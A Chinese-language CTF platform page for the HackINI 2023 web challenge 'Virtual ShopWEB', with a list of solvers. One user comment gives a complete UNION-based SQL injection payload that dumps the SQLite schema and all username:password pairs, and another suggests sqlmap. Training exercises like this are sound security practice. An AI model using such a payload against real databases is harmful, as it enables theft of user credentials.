Virtual ShopWEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2023
题目作者: 未知
一  血: heyile
一血奖励: 0金币
解  决: 476
提  示:
描  述:
So, let's see if you can retrieve the `password` of the admin which\ \ `username` is 'admin' among all the available `users` in the db\n\n\n **Author**:\ \ F100w"
评论
justsosoloveyou 2年前

' UNION SELECT (select group_concat(sql) from sqlite_master WHERE type='table'),NULL,NULL,(select group_concat(username||':'||password) FROM users)--+

回复 1

SS3B 2年前

sqlmap一下子就出来了

回复 0

hopeinhand 2年前

联合查询注入,表名、列名、用户名全给了,都没啥好说的了

回复 0

WriteUp

image
heyile

1 金币

评分(0)

暂无评分

解题动态

NeoVagabond 攻破了该题 17小时前
ysecer8 攻破了该题 3天前
hell0-hnc 攻破了该题 3天前
vx606v 攻破了该题 4天前
Yun1217 攻破了该题 6天前
星愿 攻破了该题 8天前
kxzzy 攻破了该题 9天前
zant 攻破了该题 10天前
yclbest 攻破了该题 15天前
icyskin 攻破了该题 16天前
abcd7 攻破了该题 19天前
wangmazikkll 攻破了该题 21天前
hdcc1 攻破了该题 22天前
huozi 攻破了该题 25天前
fenicnn 攻破了该题 25天前
acdfp123 攻破了该题 26天前
一世温华 攻破了该题 27天前
爱吃馒头 攻破了该题 1月前
wjzkifaa 攻破了该题 1月前
13615049106 攻破了该题 1月前
问题反馈